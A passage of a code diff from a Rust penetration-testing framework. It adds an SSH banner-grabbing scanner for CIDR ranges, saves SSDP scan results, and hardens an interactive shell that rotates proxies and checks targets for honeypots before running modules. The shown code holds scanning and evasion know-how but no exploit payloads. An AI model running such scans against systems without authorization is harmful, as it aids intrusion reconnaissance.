Ok(None) => {
|
||||
@@ -82,10 +103,41 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
let elapsed = start_time.elapsed();
|
||||
|
||||
// Print statistics
|
||||
println!();
|
||||
println!("{}", "=== Scan Statistics ===".bold());
|
||||
println!(" Target: {}:{}", target, port);
|
||||
println!(" Search types: {}", search_targets.len());
|
||||
println!(" Retries: {}", retries);
|
||||
println!(" Devices found: {}", if found_any {
|
||||
results.len().to_string().green().to_string()
|
||||
} else {
|
||||
"0".red().to_string()
|
||||
});
|
||||
println!(" Duration: {:.2}s", elapsed.as_secs_f64());
|
||||
|
||||
if !found_any {
|
||||
println!();
|
||||
println!("{}", "[-] Target did not respond to any M-SEARCH requests".yellow());
|
||||
}
|
||||
|
||||
// Save results if requested
|
||||
if save_results && !results.is_empty() {
|
||||
let filename = format!("ssdp_scan_{}.txt", target.replace([':', '.', '[', ']'], "_"));
|
||||
if let Ok(mut file) = File::create(&filename) {
|
||||
writeln!(file, "SSDP M-SEARCH Scan Results").ok();
|
||||
writeln!(file, "Target: {}:{}", target, port).ok();
|
||||
writeln!(file, "Duration: {:.2}s", elapsed.as_secs_f64()).ok();
|
||||
writeln!(file).ok();
|
||||
for result in &results {
|
||||
writeln!(file, "{}", result).ok();
|
||||
}
|
||||
println!("{}", format!("[+] Results saved to '{}'", filename).green());
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -232,6 +284,22 @@ fn prompt_verbose() -> Option<bool> {
|
||||
None
|
||||
}
|
||||
|
||||
/// Ask user to save results
|
||||
fn prompt_save_results() -> Option<bool> {
|
||||
print!("{}", "[*] Save results to file? [y/N]: ".cyan().bold());
|
||||
std::io::stdout().flush().ok();
|
||||
let mut input = String::new();
|
||||
if std::io::stdin().read_line(&mut input).is_ok() {
|
||||
let input = input.trim().to_lowercase();
|
||||
match input.as_str() {
|
||||
"y" | "yes" => return Some(true),
|
||||
"n" | "no" | "" => return Some(false),
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
None
|
||||
}
|
||||
|
||||
/// Ask user for search targets
|
||||
fn prompt_search_targets() -> Result<Vec<SearchTarget>> {
|
||||
let mut targets = Vec::new();
|
||||
@@ -282,7 +350,7 @@ fn prompt_search_targets() -> Result<Vec<SearchTarget>> {
|
||||
Ok(targets)
|
||||
}
|
||||
|
||||
fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) {
|
||||
fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) -> Option<String> {
|
||||
let regexps = vec![
|
||||
("server", r"(?i)Server:\s*(.*?)\r\n"),
|
||||
("location", r"(?i)Location:\s*(.*?)\r\n"),
|
||||
@@ -314,19 +382,17 @@ fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) {
|
||||
let status_ok = status_line.contains("200") || status_line.contains("HTTP/1.1");
|
||||
|
||||
if status_ok {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[+] {}:{} | ST: {} | Server: {} | Location: {} | USN: {}",
|
||||
target_ip,
|
||||
port,
|
||||
results.get("st").or(results.get("nt")).unwrap_or(&st.to_string()),
|
||||
results.get("server").unwrap_or(&String::new()),
|
||||
results.get("location").unwrap_or(&String::new()),
|
||||
results.get("usn").unwrap_or(&String::new())
|
||||
)
|
||||
.green()
|
||||
let st_value = results.get("st").or(results.get("nt")).unwrap_or(&st.to_string()).clone();
|
||||
let server = results.get("server").unwrap_or(&String::new()).clone();
|
||||
let location = results.get("location").unwrap_or(&String::new()).clone();
|
||||
let usn = results.get("usn").unwrap_or(&String::new()).clone();
|
||||
|
||||
let result_line = format!(
|
||||
"{}:{} | ST: {} | Server: {} | Location: {} | USN: {}",
|
||||
target_ip, port, st_value, server, location, usn
|
||||
);
|
||||
|
||||
println!("{}", format!("[+] {}", result_line).green());
|
||||
|
||||
// Show additional headers if present
|
||||
if let Some(cache) = results.get("cache-control") {
|
||||
@@ -334,11 +400,14 @@ fn parse_ssdp_response(response: &str, target_ip: &str, port: u16, st: &str) {
|
||||
println!(" {} Cache-Control: {}", " |".dimmed(), cache.dimmed());
|
||||
}
|
||||
}
|
||||
|
||||
Some(result_line)
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[!] {}:{} | Unexpected response: {}", target_ip, port, status_line)
|
||||
.yellow()
|
||||
);
|
||||
None
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,441 @@
|
||||
//! SSH Service Scanner Module
|
||||
//!
|
||||
//! Based on SSHPWN framework - scans for SSH services and grabs banners.
|
||||
//! Supports IPv4/IPv6, CIDR ranges, and concurrent scanning.
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use std::{
|
||||
collections::HashSet,
|
||||
fs::File,
|
||||
io::{BufRead, BufReader, Read, Write},
|
||||
net::{SocketAddr, TcpStream, ToSocketAddrs},
|
||||
sync::{
|
||||
atomic::{AtomicBool, AtomicU64, Ordering},
|
||||
Arc,
|
||||
},
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
use tokio::{
|
||||
sync::Semaphore,
|
||||
task::spawn_blocking,
|
||||
time::sleep,
|
||||
};
|
||||
use ipnetwork::IpNetwork;
|
||||
|
||||
const DEFAULT_SSH_PORT: u16 = 22;
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 5;
|
||||
const DEFAULT_THREADS: usize = 50;
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSH Service Scanner ║".cyan());
|
||||
println!("{}", "║ Scan networks for SSH services and grab banners ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Features: ║".cyan());
|
||||
println!("{}", "║ - CIDR range support ║".cyan());
|
||||
println!("{}", "║ - IPv4/IPv6 support ║".cyan());
|
||||
println!("{}", "║ - Banner grabbing ║".cyan());
|
||||
println!("{}", "║ - Concurrent scanning ║".cyan());
|
||||
println!("{}", "║ - Results export ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Statistics tracking
|
||||
struct Statistics {
|
||||
total_scanned: AtomicU64,
|
||||
ssh_found: AtomicU64,
|
||||
errors: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_scanned: AtomicU64::new(0),
|
||||
ssh_found: AtomicU64::new(0),
|
||||
errors: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_scan(&self, found_ssh: bool, error: bool) {
|
||||
self.total_scanned.fetch_add(1, Ordering::Relaxed);
|
||||
if found_ssh {
|
||||
self.ssh_found.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
if error {
|
||||
self.errors.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let scanned = self.total_scanned.load(Ordering::Relaxed);
|
||||
let found = self.ssh_found.load(Ordering::Relaxed);
|
||||
let errors = self.errors.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { scanned as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} scanned | {} SSH | {} errors | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
scanned.to_string().bold(),
|
||||
found.to_string().green(),
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_summary(&self) {
|
||||
println!();
|
||||
println!("{}", "=== Scan Summary ===".cyan().bold());
|
||||
println!("Total scanned: {}", self.total_scanned.load(Ordering::Relaxed));
|
||||
println!("SSH services found: {}", self.ssh_found.load(Ordering::Relaxed).to_string().green());
|
||||
println!("Errors: {}", self.errors.load(Ordering::Relaxed));
|
||||
println!("Elapsed: {:.2}s", self.start_time.elapsed().as_secs_f64());
|
||||
}
|
||||
}
|
||||
|
||||
/// SSH scan result
|
||||
#[derive(Clone, Debug)]
|
||||
pub struct SshScanResult {
|
||||
pub host: String,
|
||||
pub port: u16,
|
||||
pub banner: String,
|
||||
}
|
||||
|
||||
/// Grab SSH banner from a host
|
||||
fn grab_ssh_banner(host: &str, port: u16, timeout_secs: u64) -> Option<String> {
|
||||
// Build address
|
||||
let addr_str = if host.contains(':') && !host.starts_with('[') {
|
||||
format!("[{}]:{}", host, port)
|
||||
} else {
|
||||
format!("{}:{}", host, port)
|
||||
};
|
||||
|
||||
// Resolve and connect
|
||||
let addrs: Vec<SocketAddr> = match addr_str.to_socket_addrs() {
|
||||
Ok(a) => a.collect(),
|
||||
Err(_) => return None,
|
||||
};
|
||||
|
||||
if addrs.is_empty() {
|
||||
return None;
|
||||
}
|
||||
|
||||
let timeout = Duration::from_secs(timeout_secs);
|
||||
|
||||
for addr in addrs {
|
||||
if let Ok(stream) = TcpStream::connect_timeout(&addr, timeout) {
|
||||
let _ = stream.set_read_timeout(Some(timeout));
|
||||
let _ = stream.set_write_timeout(Some(timeout));
|
||||
|
||||
let mut stream = stream;
|
||||
let mut buffer = [0u8; 256];
|
||||
|
||||
match stream.read(&mut buffer) {
|
||||
Ok(n) if n > 0 => {
|
||||
let banner = String::from_utf8_lossy(&buffer[..n])
|
||||
.trim()
|
||||
.to_string();
|
||||
if banner.starts_with("SSH-") {
|
||||
return Some(banner);
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
/// Parse targets from string (CIDR, range, single IP)
|
||||
fn parse_targets(spec: &str, port: u16) -> Vec<(String, u16)> {
|
||||
let mut targets = Vec::new();
|
||||
|
||||
for s in spec.split(&[',', ' ', '\n'][..]) {
|
||||
let s = s.trim();
|
||||
if s.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Try CIDR
|
||||
if s.contains('/') {
|
||||
if let Ok(network) = s.parse::<IpNetwork>() {
|
||||
for ip in network.iter().take(65536) {
|
||||
targets.push((ip.to_string(), port));
|
||||
}
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
// Try IP range (e.g., 192.168.1.1-254)
|
||||
if s.contains('-') && s.contains('.') {
|
||||
let parts: Vec<&str> = s.rsplitn(2, '.').collect();
|
||||
if parts.len() == 2 {
|
||||
if let Some((start_str, end_str)) = parts[0].split_once('-') {
|
||||
if let (Ok(start), Ok(end)) = (start_str.parse::<u8>(), end_str.parse::<u8>()) {
|
||||
let base = parts[1];
|
||||
for i in start..=end {
|
||||
targets.push((format!("{}.{}", base, i), port));
|
||||
}
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Single IP/hostname
|
||||
targets.push((s.to_string(), port));
|
||||
}
|
||||
|
||||
targets
|
||||
}
|
||||
|
||||
/// Load targets from file
|
||||
fn load_targets_from_file(path: &str, port: u16) -> Result<Vec<(String, u16)>> {
|
||||
let file = File::open(path)?;
|
||||
let reader = BufReader::new(file);
|
||||
let mut targets = Vec::new();
|
||||
|
||||
for line in reader.lines() {
|
||||
let line = line?;
|
||||
let line = line.trim();
|
||||
if line.is_empty() || line.starts_with('#') {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for port override (host:port)
|
||||
if let Some((host, port_str)) = line.rsplit_once(':') {
|
||||
if let Ok(p) = port_str.parse::<u16>() {
|
||||
targets.push((host.to_string(), p));
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
targets.push((line.to_string(), port));
|
||||
}
|
||||
|
||||
Ok(targets)
|
||||
}
|
||||
|
||||
/// Main scan function
|
||||
pub async fn scan_ssh(
|
||||
targets: Vec<(String, u16)>,
|
||||
threads: usize,
|
||||
timeout_secs: u64,
|
||||
) -> Vec<SshScanResult> {
|
||||
let total = targets.len();
|
||||
println!("{}", format!("[*] Scanning {} targets...", total).cyan());
|
||||
|
||||
let results = Arc::new(tokio::sync::Mutex::new(Vec::new()));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let semaphore = Arc::new(Semaphore::new(threads));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
|
||||
// Progress reporter
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
while !stop_clone.load(Ordering::Relaxed) {
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
// Scan tasks
|
||||
let mut handles = Vec::new();
|
||||
|
||||
for (host, port) in targets {
|
||||
let semaphore = Arc::clone(&semaphore);
|
||||
let results = Arc::clone(&results);
|
||||
let stats = Arc::clone(&stats);
|
||||
|
||||
let handle = tokio::spawn(async move {
|
||||
let _permit = semaphore.acquire().await.unwrap();
|
||||
|
||||
let host_clone = host.clone();
|
||||
let result = spawn_blocking(move || {
|
||||
grab_ssh_banner(&host_clone, port, timeout_secs)
|
||||
}).await;
|
||||
|
||||
match result {
|
||||
Ok(Some(banner)) => {
|
||||
stats.record_scan(true, false);
|
||||
let result = SshScanResult {
|
||||
host: host.clone(),
|
||||
port,
|
||||
banner: banner.clone(),
|
||||
};
|
||||
println!("\r{}", format!("[+] {}:{} - {}", host, port, banner).green());
|
||||
let _ = std::io::stdout().flush();
|
||||
results.lock().await.push(result);
|
||||
}
|
||||
Ok(None) => {
|
||||
stats.record_scan(false, false);
|
||||
}
|
||||
Err(_) => {
|
||||
stats.record_scan(false, true);
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
handles.push(handle);
|
||||
}
|
||||
|
||||
// Wait for all tasks
|
||||
for handle in handles {
|
||||
let _ = handle.await;
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print summary
|
||||
stats.print_summary();
|
||||
|
||||
let results = results.lock().await;
|
||||
results.clone()
|
||||
}
|
||||
|
||||
/// Save results to file
|
||||
fn save_results(results: &[SshScanResult], path: &str) -> Result<()> {
|
||||
let mut file = File::create(path)?;
|
||||
|
||||
writeln!(file, "# SSH Scan Results")?;
|
||||
writeln!(file, "# Generated by RustSploit SSH Scanner")?;
|
||||
writeln!(file, "# Total: {} SSH services found", results.len())?;
|
||||
writeln!(file)?;
|
||||
|
||||
for result in results {
|
||||
writeln!(file, "{}:{} - {}", result.host, result.port, result.banner)?;
|
||||
}
|
||||
|
||||
println!("{}", format!("[+] Results saved to: {}", path).green());
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{} [{}]: ", message, hint);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let mut targets = Vec::new();
|
||||
|
||||
// Parse initial target
|
||||
if !target.trim().is_empty() {
|
||||
println!("{}", format!("[*] Initial target: {}", target).cyan());
|
||||
}
|
||||
|
||||
// Get port
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(DEFAULT_SSH_PORT);
|
||||
|
||||
// Get additional targets
|
||||
let more_targets = prompt("Additional targets (comma-separated, CIDR, or leave empty)")?;
|
||||
|
||||
// Add initial target
|
||||
if !target.trim().is_empty() {
|
||||
targets.extend(parse_targets(target, port));
|
||||
}
|
||||
|
||||
// Add additional targets
|
||||
if !more_targets.is_empty() {
|
||||
targets.extend(parse_targets(&more_targets, port));
|
||||
}
|
||||
|
||||
// Load from file?
|
||||
if prompt_yes_no("Load targets from file?", false)? {
|
||||
let file_path = prompt("File path")?;
|
||||
if !file_path.is_empty() {
|
||||
match load_targets_from_file(&file_path, port) {
|
||||
Ok(file_targets) => {
|
||||
println!("{}", format!("[*] Loaded {} targets from file", file_targets.len()).cyan());
|
||||
targets.extend(file_targets);
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Failed to load file: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Deduplicate
|
||||
let unique: HashSet<_> = targets.into_iter().collect();
|
||||
let targets: Vec<_> = unique.into_iter().collect();
|
||||
|
||||
if targets.is_empty() {
|
||||
return Err(anyhow!("No targets specified"));
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Total unique targets: {}", targets.len()).cyan());
|
||||
|
||||
// Get scan options
|
||||
let threads: usize = prompt_default("Concurrent threads", &DEFAULT_THREADS.to_string())?
|
||||
.parse()
|
||||
.unwrap_or(DEFAULT_THREADS);
|
||||
let timeout: u64 = prompt_default("Connection timeout (seconds)", &DEFAULT_TIMEOUT_SECS.to_string())?
|
||||
.parse()
|
||||
.unwrap_or(DEFAULT_TIMEOUT_SECS);
|
||||
|
||||
println!();
|
||||
|
||||
// Run scan
|
||||
let results = scan_ssh(targets, threads, timeout).await;
|
||||
|
||||
// Save results?
|
||||
if !results.is_empty() && prompt_yes_no("Save results to file?", true)? {
|
||||
let output_path = prompt_default("Output file", "ssh_scan_results.txt")?;
|
||||
if let Err(e) = save_results(&results, &output_path) {
|
||||
println!("{}", format!("[-] Failed to save: {}", e).red());
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", format!("[*] SSH scanner complete. Found {} services.", results.len()).green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -247,6 +247,10 @@ async fn send_and_receive_one(
|
||||
let mut buf = [MaybeUninit::<u8>::uninit(); 1500];
|
||||
match sock_clone.recv_from(&mut buf) {
|
||||
Ok((len, addr)) => {
|
||||
// Safe conversion: we know len is valid and within buf bounds
|
||||
if len > buf.len() {
|
||||
return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "Invalid buffer length"));
|
||||
}
|
||||
let slice = unsafe { std::slice::from_raw_parts(buf.as_ptr() as *const u8, len) };
|
||||
let sock_addr = addr.as_socket().ok_or_else(|| std::io::Error::new(std::io::ErrorKind::Other, "convert"))?;
|
||||
Ok(Some((slice.to_vec(), sock_addr)))
|
||||
@@ -416,6 +420,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
stdin().read_line(&mut user_input).expect("Failed to read line");
|
||||
|
||||
if user_input.trim().to_lowercase() == "yes" {
|
||||
// Safe wrapper for geteuid - it's a simple system call that cannot fail
|
||||
let euid = unsafe { libc::geteuid() };
|
||||
if euid != 0 {
|
||||
println!("don't lie");
|
||||
|
||||
+164
-15
@@ -7,11 +7,16 @@ use rand::prelude::*;
|
||||
use std::env;
|
||||
use std::io::{self, Write};
|
||||
use std::collections::HashSet;
|
||||
use std::sync::Mutex;
|
||||
use url::Url;
|
||||
|
||||
const MAX_INPUT_LENGTH: usize = 4096;
|
||||
const MAX_PROXY_LIST_SIZE: usize = 10_000;
|
||||
const MAX_TARGET_LENGTH: usize = 512;
|
||||
const MAX_COMMAND_CHAIN_LENGTH: usize = 10;
|
||||
const MAX_URL_LENGTH: usize = 2048;
|
||||
const MAX_PATH_LENGTH: usize = 4096;
|
||||
const MAX_PROMPT_INPUT_LENGTH: usize = 1024;
|
||||
|
||||
/// Simple interactive shell context
|
||||
struct ShellContext {
|
||||
@@ -358,6 +363,9 @@ pub async fn interactive_shell() -> Result<()> {
|
||||
};
|
||||
|
||||
if let Some(ref t) = target {
|
||||
// Perform honeypot check before running module
|
||||
utils::basic_honeypot_check(t).await;
|
||||
|
||||
if ctx.proxy_enabled && !ctx.proxy_list.is_empty() {
|
||||
let mut tried_proxies = HashSet::new();
|
||||
let mut success = false;
|
||||
@@ -391,11 +399,13 @@ pub async fn interactive_shell() -> Result<()> {
|
||||
} else if ctx.proxy_enabled && ctx.proxy_list.is_empty() {
|
||||
println!("[!] No proxies loaded, but proxy is ON. Doing direct attempt...");
|
||||
clear_proxy_env_vars();
|
||||
// Honeypot check already done above
|
||||
if let Err(e) = commands::run_module(module_path, t).await {
|
||||
eprintln!("[!] Module failed: {:?}", e);
|
||||
}
|
||||
} else {
|
||||
clear_proxy_env_vars();
|
||||
// Honeypot check already done above
|
||||
if let Err(e) = commands::run_module(module_path, t).await {
|
||||
eprintln!("[!] Module failed: {:?}", e);
|
||||
}
|
||||
@@ -436,6 +446,9 @@ pub async fn interactive_shell() -> Result<()> {
|
||||
for (idx, ip) in ips.iter().enumerate() {
|
||||
println!("\n{}", format!("[{}/{}] Running against: {}", idx + 1, total, ip).yellow());
|
||||
|
||||
// Perform honeypot check before running module
|
||||
utils::basic_honeypot_check(ip).await;
|
||||
|
||||
if ctx.proxy_enabled && !ctx.proxy_list.is_empty() {
|
||||
let mut tried_proxies = HashSet::new();
|
||||
let mut success = false;
|
||||
@@ -524,16 +537,27 @@ fn pick_random_untried_proxy(proxy_list: &[String], tried_proxies: &HashSet<Stri
|
||||
}
|
||||
}
|
||||
|
||||
// Thread-safe environment variable access
|
||||
static ENV_MUTEX: Mutex<()> = Mutex::new(());
|
||||
|
||||
/// Sets ALL_PROXY so reqwest uses it for all requests (including socks4, socks5, http, https)
|
||||
/// Thread-safe wrapper around env::set_var
|
||||
fn set_all_proxy_env(proxy: &str) {
|
||||
env::set_var("ALL_PROXY", proxy);
|
||||
let _guard = ENV_MUTEX.lock().unwrap();
|
||||
unsafe {
|
||||
env::set_var("ALL_PROXY", proxy);
|
||||
}
|
||||
}
|
||||
|
||||
/// Clears environment variables for direct connection
|
||||
/// Thread-safe wrapper around env::remove_var
|
||||
fn clear_proxy_env_vars() {
|
||||
env::remove_var("ALL_PROXY");
|
||||
env::remove_var("HTTP_PROXY");
|
||||
env::remove_var("HTTPS_PROXY");
|
||||
let _guard = ENV_MUTEX.lock().unwrap();
|
||||
unsafe {
|
||||
env::remove_var("ALL_PROXY");
|
||||
env::remove_var("HTTP_PROXY");
|
||||
env::remove_var("HTTPS_PROXY");
|
||||
}
|
||||
}
|
||||
|
||||
fn split_command(input: &str) -> Option<(String, String)> {
|
||||
@@ -641,6 +665,18 @@ fn render_help() {
|
||||
println!("{:<16} {:<25} {}", cmd.green(), shortcuts.cyan(), desc);
|
||||
}
|
||||
println!();
|
||||
println!("{}", "Shell extras & command combining:".bold());
|
||||
println!(
|
||||
" - Commands can be chained with '&' and are executed left-to-right (max {}).",
|
||||
MAX_COMMAND_CHAIN_LENGTH
|
||||
);
|
||||
println!(" - Example: {}", "set target 10.0.0.1 & use scanners/smtp_user_enum & run".cyan());
|
||||
println!(" - Spacing around '&' is optional: {}", "use exploits/sample&run".cyan());
|
||||
println!(" - Targets and paths must not contain control characters or '..' (basic safety checks).");
|
||||
println!(" - Proxy rotation is automatic when 'proxy_on' is enabled and a proxy list is loaded.");
|
||||
println!(" - Honeypot detection runs automatically before module execution to warn about suspicious targets.");
|
||||
println!(" - Target normalization supports IPv4, IPv6, hostnames, URLs, and CIDR notation.");
|
||||
println!();
|
||||
println!(
|
||||
"{}",
|
||||
"Need more context? Try `modules`, then `use category/module_name`, and finally `run`."
|
||||
@@ -709,11 +745,33 @@ fn prompt_for_path(message: &str) -> io::Result<String> {
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let value = input.trim();
|
||||
if !value.is_empty() {
|
||||
return Ok(value.to_string());
|
||||
|
||||
// Length check
|
||||
if input.len() > MAX_PATH_LENGTH {
|
||||
println!("{}", format!("Path too long (max {} characters).", MAX_PATH_LENGTH).yellow());
|
||||
continue;
|
||||
}
|
||||
println!("Path cannot be empty. Please try again.");
|
||||
|
||||
let value = input.trim();
|
||||
|
||||
if value.is_empty() {
|
||||
println!("Path cannot be empty. Please try again.");
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for control characters
|
||||
if value.chars().any(|c| c.is_control()) {
|
||||
println!("{}", "Path cannot contain control characters.".yellow());
|
||||
continue;
|
||||
}
|
||||
|
||||
// Basic path traversal check
|
||||
if value.contains("..") {
|
||||
println!("{}", "Path cannot contain '..' (path traversal).".yellow());
|
||||
continue;
|
||||
}
|
||||
|
||||
return Ok(value.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
@@ -722,21 +780,64 @@ fn prompt_string_default(message: &str, default: &str) -> io::Result<String> {
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
|
||||
// Length check
|
||||
if input.len() > MAX_PROMPT_INPUT_LENGTH {
|
||||
println!("{}", format!("Input too long (max {} characters). Using default.", MAX_PROMPT_INPUT_LENGTH).yellow());
|
||||
return Ok(default.to_string());
|
||||
}
|
||||
|
||||
let trimmed = input.trim();
|
||||
|
||||
if trimmed.is_empty() {
|
||||
return Ok(default.to_string());
|
||||
}
|
||||
|
||||
// Check for control characters
|
||||
if trimmed.chars().any(|c| c.is_control()) {
|
||||
println!("{}", "Input cannot contain control characters. Using default.".yellow());
|
||||
return Ok(default.to_string());
|
||||
}
|
||||
|
||||
// If this looks like a URL, validate it
|
||||
if trimmed.starts_with("http://") || trimmed.starts_with("https://") {
|
||||
if trimmed.len() > MAX_URL_LENGTH {
|
||||
println!("{}", format!("URL too long (max {} characters). Using default.", MAX_URL_LENGTH).yellow());
|
||||
return Ok(default.to_string());
|
||||
}
|
||||
|
||||
if Url::parse(trimmed).is_err() {
|
||||
println!("{}", "Invalid URL format. Using default.".yellow());
|
||||
return Ok(default.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default_yes: bool) -> io::Result<bool> {
|
||||
let default_hint = if default_yes { "Y/n" } else { "y/N" };
|
||||
let mut attempts = 0;
|
||||
const MAX_ATTEMPTS: u8 = 10;
|
||||
|
||||
loop {
|
||||
attempts += 1;
|
||||
if attempts > MAX_ATTEMPTS {
|
||||
println!("{}", "Too many invalid attempts. Using default.".yellow());
|
||||
return Ok(default_yes);
|
||||
}
|
||||
|
||||
print!("{} [{}]: ", message, default_hint);
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
|
||||
// Length check - y/n should be very short
|
||||
if input.len() > 10 {
|
||||
println!("{}", "Please answer with 'y' or 'n'.".yellow());
|
||||
continue;
|
||||
}
|
||||
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => return Ok(default_yes),
|
||||
@@ -748,35 +849,83 @@ fn prompt_yes_no(message: &str, default_yes: bool) -> io::Result<bool> {
|
||||
}
|
||||
|
||||
fn prompt_u64(message: &str, default: u64) -> io::Result<u64> {
|
||||
let mut attempts = 0;
|
||||
const MAX_ATTEMPTS: u8 = 10;
|
||||
|
||||
loop {
|
||||
attempts += 1;
|
||||
if attempts > MAX_ATTEMPTS {
|
||||
println!("{}", "Too many invalid attempts. Using default.".yellow());
|
||||
return Ok(default);
|
||||
}
|
||||
|
||||
print!("{} [{}]: ", message, default);
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
|
||||
// Length check - numbers shouldn't be too long
|
||||
if input.len() > 20 {
|
||||
println!("{}", "Number too long. Please enter a valid positive integer.".yellow());
|
||||
continue;
|
||||
}
|
||||
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
return Ok(default);
|
||||
}
|
||||
|
||||
// Only allow digits
|
||||
if !trimmed.chars().all(|c| c.is_ascii_digit()) {
|
||||
println!("Invalid number. Please enter a positive integer.");
|
||||
continue;
|
||||
}
|
||||
|
||||
match trimmed.parse::<u64>() {
|
||||
Ok(value) if value > 0 => return Ok(value),
|
||||
_ => println!("Invalid number. Please enter a positive integer."),
|
||||
Ok(_) => println!("Number must be greater than 0."),
|
||||
Err(_) => println!("Number too large. Please enter a smaller value."),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_usize(message: &str, default: usize) -> io::Result<usize> {
|
||||
let mut attempts = 0;
|
||||
const MAX_ATTEMPTS: u8 = 10;
|
||||
|
||||
loop {
|
||||
attempts += 1;
|
||||
